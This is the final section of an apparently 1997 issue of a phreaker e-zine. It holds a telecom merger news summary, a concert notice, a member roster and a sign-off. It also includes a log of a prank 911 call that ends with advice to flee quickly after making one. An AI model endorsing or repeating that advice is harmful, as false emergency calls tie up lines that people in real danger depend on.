"Before, the technology necessary to invade our privacy could only be
afforded by large companies - the Fortune 500. Then the technology spread to
the Fortune 5000, and now it's about to spread to the Fortune 500,000. Is
that progress?"

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Phone giants talk of $50 billion deal
USA Today, May 28, 1997

AT&T and SBC Communications, the prior Southwestern Bell, are trying to come
up with a merger accord that would be worth $50 bil, the largest merger in
history. It would unite AT&T, which has a 52% market share in the US long
distance sector, and SBC which, since merging with Pacific Telesis, has a
25% market share in US local calling. Nevertheless, the merger would be
expected to face antitrust and regulatory hurdles. AT&T would become a
telecom giant with revenue of $80 bil/yr, which would be considerably larger
than the second largest phone firm, which is the merged Bell Atlantic-Nynex
with revenue in 1996 of $30 bil. Although AT&T does not have problems now,
problems can be expected in the future due to fierce competition from other
mergers. Detail is given to what the Justice Department's antitrust div can
be expected to examine in looking at the possible merger.

©1997 USA Today
_____________________________________________________________

13. HFStival on May 31st
The 8th Annual HFStival run by Scud-O's favorite local radio station,
WHFS 99.1 is going to take place this May 31st at RFK Stadium in Washington
DC. I hope you got your tickets early, as they sold out in a record 97 minutes
this year. This year, the tickets went for $20 ( plus a $3.50 service charge)
for 20 bands. The bands playing include: Prodigy, Beck, Cardigans, Jamiroquai,
Mighty Mighty Bosstones, Reel Big Fish, Squirrel Nut Zippers, Summer Camp, Verve
Pipe, Kula Shaker, Local H, K's Choice, Jimmie's Chicken Shack, and........
SOUL COUGHING ( Look at the article after the editorial in this issue for more
info), and several other TBA bands.

[P H O N E L O G S]------------------------------------------------

<Scud-O>Ummm, hello there, 911?
<Operator>Yes, how may i direct your call
<Scud-O>Um, can you call my mommy for me?
<Operator>No sir, we dont do that, this line is needed for other calls
<Scud-O>Well, im hurt, i need help
<Operator>Whats wrong sir?
<Scud-O>I just killed someone
<Operator>Sir, is this a prank?
<Scud-O>No, im serious, i need help, he attacked me, and i fought back,
now he's dead!
<Operator>Who is dead sir?
<Scud-O>He is! I killed him!
<Operator>Sir, who did you kill?
<Scud-O>HIM! I KILLED HIM!
<Operator>Sir, im forwarding you to the police
<Scud-O>No, i need help, he needs to be stitched up
<Operator>Who needs to be stitched up?
<Scud-O>HE does, my teddy bear.
<Operator>Sir, this is a prank, please hang up.
<Scud-O>NO! Not until i get my mommy!
<Operator>Sir, calling up 911 without an emergency is a crime, i am sending a
squad car out to your location.
<Scud-O>Well, ok, will they have my mommy?
<Operator>No, no they will not have your mommy
<Scud-O>Will they have a warm cuddy blanket for me?
<Operator>No
<Scud-O>Warm cookies and milk?
<Operator>NO!
<Scud-O>OK then, bye-bye.
[ C L I C K ]
NOTE: This was done in a local mall about 30 minutes before the stores opened,
so it was pretty quiet, but a squad car did show up, so next time you call
911, make sure you get away fast.


_____________________________________________________________

------------------------                 ----------------------
-[HAVOC Bell Systems]-                   -[Acknowledgements]-
------------------------                 ----------------------

ArcAngl   : Just joined up
Agrajag   : Back from the dead           btm       : Elite (MIA?)
darkcyde  : #phreak old-schooler         digipimp  : Co-conspirator
Digital_X : Nemesis (MIA?)               dr1x      : It's 420!
disc0re   : Thinks we're on NBC          ec|ipse   : Hysterical bastard
Keystroke : Submissions Editor           shamrock  : nice hair
KungFuFox : Helped Reform #phreak        RBCP      : Funniest man alive
memor     : Ueberleet French phreak      shoelace  : FINALLY has ops
psych0    : Lame ass mofo                halflife  : master idler
REality   : Owns Own3r                   darc      : Left #phreak
Scud-O    : Has a new car!               JP        : Runs Antionline.com
Redtyde   : #phreak not so old-schooler  tombin    : phear!
theLURK3R : Out Clubbing                 antifire  : NT security guru
UnaBomber : Tired of IRC (MIA?)          ChiaPope  : sniff, we miss wrath!
                                         FH        : He's so FUCKING HOSTILE!
-------------------                      TMessiah  : Believes in 'Utopia'
-[ Channels ]-                           fsh       : Text File Archiver
-------------------                      Modify    : Lives near Scud-O
#phreak   : Newly Reformed               |Banshee| : Also lives near Scud-O
#hackteach: One Busy Channel             mC        : infected.com - nuff said!
#sin      : SIN Home                     silitoad  : Did ya like thtj?


_____________________________________________________________

This Month's Question: What the fuck is this m00 thing?
m00 v1.0 is a simple Firewall Defense Mechanism i am creating. I have
absolutely no idea when it will come out, so don't bug me about it.


_____________________________________________________________

Next Month:
Look, we can predict the future about as well as a weatherman, so
just chill out until July 1st to see what is going to be in thtj12!

Issue 12 is out July 1st!

Send all articles for issue 12 to Keystroke at: keystroke@thepentagon.com

Tune in next time, Same Bat Time, Same Bat Channel!

===========================================================
= Is this copy of The HAVOC Technical Journal skunked?    =
= If this file doesn't read at 120924 bytes, it probably  =
= doesn't have a born on date! Get a fresh copy from our  =
= NEW site at: http://www.antionline.com/hbs/             =
===========================================================

-[End of Communique]-
